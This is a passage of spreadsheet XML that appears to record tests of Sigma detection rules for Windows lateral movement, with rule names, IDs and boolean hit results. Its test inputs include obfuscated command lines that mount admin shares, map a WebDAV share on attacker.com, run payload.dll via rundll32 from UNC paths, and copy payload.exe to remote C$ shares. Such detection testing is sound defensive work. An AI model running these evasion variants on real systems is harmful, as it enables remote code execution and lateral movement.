          <t>Windows Admin Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D81" s="36" t="inlineStr">
        <is>
          <t>3abd6094-7027-475f-9630-8ab9be7b9725</t>
        </is>
      </c>
      <c r="E81" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-SmbMapping -LocalPath 'Z:' -RemotePath '\\192.168.1.100\C$'"</t>
        </is>
      </c>
      <c r="F81" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G81" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H81" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I81" s="43" t="n"/>
      <c r="J81" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K81" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="82" ht="15.75" customHeight="1" s="42">
      <c r="A82" s="43" t="n"/>
      <c r="B82" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_admin_share</t>
        </is>
      </c>
      <c r="C82" s="36" t="inlineStr">
        <is>
          <t>Windows Admin Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D82" s="36" t="inlineStr">
        <is>
          <t>3abd6094-7027-475f-9630-8ab9be7b9725</t>
        </is>
      </c>
      <c r="E82" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMand "New-SmbMapping -LocalPath 'Z:' -RemotePath '\\192.168.1.100\C$'"</t>
        </is>
      </c>
      <c r="F82" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G82" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H82" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I82" s="43" t="n"/>
      <c r="J82" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K82" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="83" ht="15.75" customHeight="1" s="42">
      <c r="A83" s="43" t="n"/>
      <c r="B83" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_admin_share</t>
        </is>
      </c>
      <c r="C83" s="36" t="inlineStr">
        <is>
          <t>Windows Admin Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D83" s="36" t="inlineStr">
        <is>
          <t>3abd6094-7027-475f-9630-8ab9be7b9725</t>
        </is>
      </c>
      <c r="E83" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "New-SmbMapping -LocalPath 'Z:' -RemotePath '\\192.168.1.100\C$'"</t>
        </is>
      </c>
      <c r="F83" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G83" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H83" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I83" s="43" t="n"/>
      <c r="J83" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K83" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="84" ht="15.75" customHeight="1" s="42">
      <c r="A84" s="43" t="n"/>
      <c r="B84" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_admin_share</t>
        </is>
      </c>
      <c r="C84" s="36" t="inlineStr">
        <is>
          <t>Windows Admin Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D84" s="36" t="inlineStr">
        <is>
          <t>3abd6094-7027-475f-9630-8ab9be7b9725</t>
        </is>
      </c>
      <c r="E84" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaND "New-SmbMapping -LocalPath 'Z:' -RemotePath '\\192.168.1.100\C$'"</t>
        </is>
      </c>
      <c r="F84" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G84" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H84" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I84" s="36" t="n"/>
      <c r="J84" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K84" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="85" ht="15.75" customHeight="1" s="42">
      <c r="A85" s="43" t="n"/>
      <c r="B85" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_admin_share</t>
        </is>
      </c>
      <c r="C85" s="36" t="inlineStr">
        <is>
          <t>Windows Admin Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D85" s="36" t="inlineStr">
        <is>
          <t>3abd6094-7027-475f-9630-8ab9be7b9725</t>
        </is>
      </c>
      <c r="E85" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAnD "New-SmbMapping -LocalPath 'Z:' -RemotePath '\\192.168.1.100\C$'"</t>
        </is>
      </c>
      <c r="F85" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G85" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H85" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I85" s="36" t="n"/>
      <c r="J85" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K85" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="86" ht="15.75" customHeight="1" s="42">
      <c r="A86" s="43" t="n"/>
      <c r="B86" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_internet_share</t>
        </is>
      </c>
      <c r="C86" s="36" t="inlineStr">
        <is>
          <t>Windows Internet Hosted WebDav Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D86" s="36" t="inlineStr">
        <is>
          <t>7e6237fe-3ddb-438f-9381-9bf9de5af8d0</t>
        </is>
      </c>
      <c r="E86" s="36" t="inlineStr">
        <is>
          <t>net use Z: \\attacker.com@80\share</t>
        </is>
      </c>
      <c r="F86" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G86" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H86" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I86" s="43" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE (f117933c-980c-4f78-b384-e3d838111165); System Network Connections Discovery Via Net.EXE (1c67a717-32ba-409b-a45d-0fb704a73a81)</t>
        </is>
      </c>
      <c r="J86" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K86" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="87" ht="15.75" customHeight="1" s="42">
      <c r="A87" s="43" t="n"/>
      <c r="B87" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_internet_share</t>
        </is>
      </c>
      <c r="C87" s="36" t="inlineStr">
        <is>
          <t>Windows Internet Hosted WebDav Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D87" s="36" t="inlineStr">
        <is>
          <t>7e6237fe-3ddb-438f-9381-9bf9de5af8d0</t>
        </is>
      </c>
      <c r="E87" s="36" t="inlineStr">
        <is>
          <t>net use Z:"http://attacker.com/share"</t>
        </is>
      </c>
      <c r="F87" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G87" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H87" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I87" s="43" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE (f117933c-980c-4f78-b384-e3d838111165); System Network Connections Discovery Via Net.EXE (1c67a717-32ba-409b-a45d-0fb704a73a81)</t>
        </is>
      </c>
      <c r="J87" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K87" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="88" ht="15.75" customHeight="1" s="42">
      <c r="A88" s="43" t="n"/>
      <c r="B88" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_share</t>
        </is>
      </c>
      <c r="C88" s="36" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D88" s="36" t="inlineStr">
        <is>
          <t>f117933c-980c-4f78-b384-e3d838111165</t>
        </is>
      </c>
      <c r="E88" s="36" t="inlineStr">
        <is>
          <t>pushd \\192.168.1.10\share</t>
        </is>
      </c>
      <c r="F88" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G88" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H88" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I88" s="43" t="n"/>
      <c r="J88" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K88" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="89" ht="15.75" customHeight="1" s="42">
      <c r="A89" s="43" t="n"/>
      <c r="B89" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_share</t>
        </is>
      </c>
      <c r="C89" s="36" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D89" s="36" t="inlineStr">
        <is>
          <t>f117933c-980c-4f78-b384-e3d838111165</t>
        </is>
      </c>
      <c r="E89" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-SmbMapping -LocalPath 'Z:' -RemotePath '\\192.168.1.10\share'"</t>
        </is>
      </c>
      <c r="F89" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G89" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H89" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I89" s="43" t="n"/>
      <c r="J89" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K89" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="90" ht="15.75" customHeight="1" s="42">
      <c r="A90" s="43" t="n"/>
      <c r="B90" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_share</t>
        </is>
      </c>
      <c r="C90" s="36" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D90" s="36" t="inlineStr">
        <is>
          <t>f117933c-980c-4f78-b384-e3d838111165</t>
        </is>
      </c>
      <c r="E90" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAnd "New-SmbMapping -LocalPath 'Z:' -RemotePath '\\192.168.1.10\share'"</t>
        </is>
      </c>
      <c r="F90" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G90" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H90" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I90" s="43" t="n"/>
      <c r="J90" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K90" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="91" ht="15.75" customHeight="1" s="42">
      <c r="A91" s="43" t="n"/>
      <c r="B91" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_share</t>
        </is>
      </c>
      <c r="C91" s="36" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D91" s="36" t="inlineStr">
        <is>
          <t>f117933c-980c-4f78-b384-e3d838111165</t>
        </is>
      </c>
      <c r="E91" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAND "New-SmbMapping -LocalPath 'Z:' -RemotePath '\\192.168.1.10\share'"</t>
        </is>
      </c>
      <c r="F91" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G91" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H91" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I91" s="43" t="n"/>
      <c r="J91" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K91" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="92" ht="15.75" customHeight="1" s="42">
      <c r="A92" s="43" t="n"/>
      <c r="B92" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_share</t>
        </is>
      </c>
      <c r="C92" s="36" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D92" s="36" t="inlineStr">
        <is>
          <t>f117933c-980c-4f78-b384-e3d838111165</t>
        </is>
      </c>
      <c r="E92" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAnd "New-SmbMapping -LocalPath 'Z:' -RemotePath '\\192.168.1.10\share'"</t>
        </is>
      </c>
      <c r="F92" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G92" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H92" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I92" s="43" t="n"/>
      <c r="J92" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K92" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="93" ht="15.75" customHeight="1" s="42">
      <c r="A93" s="43" t="n"/>
      <c r="B93" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_share</t>
        </is>
      </c>
      <c r="C93" s="36" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D93" s="36" t="inlineStr">
        <is>
          <t>f117933c-980c-4f78-b384-e3d838111165</t>
        </is>
      </c>
      <c r="E93" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "New-SmbMapping -LocalPath 'Z:' -RemotePath '\\192.168.1.10\share'"</t>
        </is>
      </c>
      <c r="F93" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G93" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H93" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I93" s="43" t="n"/>
      <c r="J93" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K93" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="94" ht="15.75" customHeight="1" s="42">
      <c r="A94" s="43" t="n"/>
      <c r="B94" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_mount_share</t>
        </is>
      </c>
      <c r="C94" s="36" t="inlineStr">
        <is>
          <t>Windows Share Mount Via Net.EXE</t>
        </is>
      </c>
      <c r="D94" s="36" t="inlineStr">
        <is>
          <t>f117933c-980c-4f78-b384-e3d838111165</t>
        </is>
      </c>
      <c r="E94" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMaND "New-SmbMapping -LocalPath 'Z:' -RemotePath '\\192.168.1.10\share'"</t>
        </is>
      </c>
      <c r="F94" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G94" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H94" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I94" s="43" t="n"/>
      <c r="J94" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K94" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="95" ht="15.75" customHeight="1" s="42">
      <c r="A95" s="43" t="n"/>
      <c r="B95" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C95" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D95" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E95" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.100/share/payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F95" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G95" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H95" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I95" s="43" t="n"/>
      <c r="J95" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K95" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="96" ht="15.75" customHeight="1" s="42">
      <c r="A96" s="43" t="n"/>
      <c r="B96" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C96" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D96" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E96" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/share/payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F96" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G96" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H96" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I96" s="43" t="n"/>
      <c r="J96" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K96" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="97" ht="15.75" customHeight="1" s="42">
      <c r="A97" s="43" t="n"/>
      <c r="B97" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C97" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D97" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E97" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe /"/192.168.1.1/share/payload.dll,EntryPoint"</t>
        </is>
      </c>
      <c r="F97" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G97" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H97" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I97" s="43" t="n"/>
      <c r="J97" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K97" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="98" ht="15.75" customHeight="1" s="42">
      <c r="A98" s="43" t="n"/>
      <c r="B98" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C98" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D98" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E98" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe -"/192.168.1.1/share/payload.dll,EntryPoint"</t>
        </is>
      </c>
      <c r="F98" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G98" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H98" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I98" s="43" t="n"/>
      <c r="J98" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K98" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="99" ht="15.75" customHeight="1" s="42">
      <c r="A99" s="43" t="n"/>
      <c r="B99" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C99" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D99" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E99" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/SHAre/pAYLOAd.Dll,enTrypoiNT</t>
        </is>
      </c>
      <c r="F99" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G99" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H99" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I99" s="43" t="n"/>
      <c r="J99" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K99" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="100" ht="15.75" customHeight="1" s="42">
      <c r="A100" s="43" t="n"/>
      <c r="B100" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C100" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D100" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E100" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/shAre/PaylOAD.dLl,EnTRYPOInt</t>
        </is>
      </c>
      <c r="F100" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G100" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H100" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I100" s="36" t="n"/>
      <c r="J100" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K100" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="101" ht="15.75" customHeight="1" s="42">
      <c r="A101" s="43" t="n"/>
      <c r="B101" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C101" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D101" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E101" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F101" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G101" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H101" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I101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01" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K101" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="102" ht="15.75" customHeight="1" s="42">
      <c r="A102" s="43" t="n"/>
      <c r="B102" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C102" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D102" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E102" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F102" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G102" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H102" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I102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02" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K102" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="103" ht="15.75" customHeight="1" s="42">
      <c r="A103" s="43" t="n"/>
      <c r="B103" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C103" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D103" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E103" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F103" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G103" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H103" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I103" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J103" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K103" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="104" ht="15.75" customHeight="1" s="42">
      <c r="A104" s="43" t="n"/>
      <c r="B104" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C104" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D104" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E104" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F104" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G104" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H104" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I104" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J104" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K104" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="105" ht="15.75" customHeight="1" s="42">
      <c r="A105" s="43" t="n"/>
      <c r="B105" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C105" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D105" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E105" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMaNd "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F105" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G105" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H105" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I105" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J105" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K105" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="106" ht="15.75" customHeight="1" s="42">
      <c r="A106" s="43" t="n"/>
      <c r="B106" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C106" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D106" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E106" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comManD "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F106" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G106" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H106" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I106" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J106" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K106" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="107" ht="15.75" customHeight="1" s="42">
      <c r="A107" s="43" t="n"/>
      <c r="B107" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C107" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D107" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E107" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F107" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G107" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H107" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I107" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J107" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K107" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="108" ht="15.75" customHeight="1" s="42">
      <c r="A108" s="43" t="n"/>
      <c r="B108" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C108" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D108" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E108" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F108" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G108" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H108" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I108" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J108" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K108" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="109" ht="15.75" customHeight="1" s="42">
      <c r="A109" s="43" t="n"/>
      <c r="B109" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C109" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D109" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E109" s="36" t="inlineStr">
        <is>
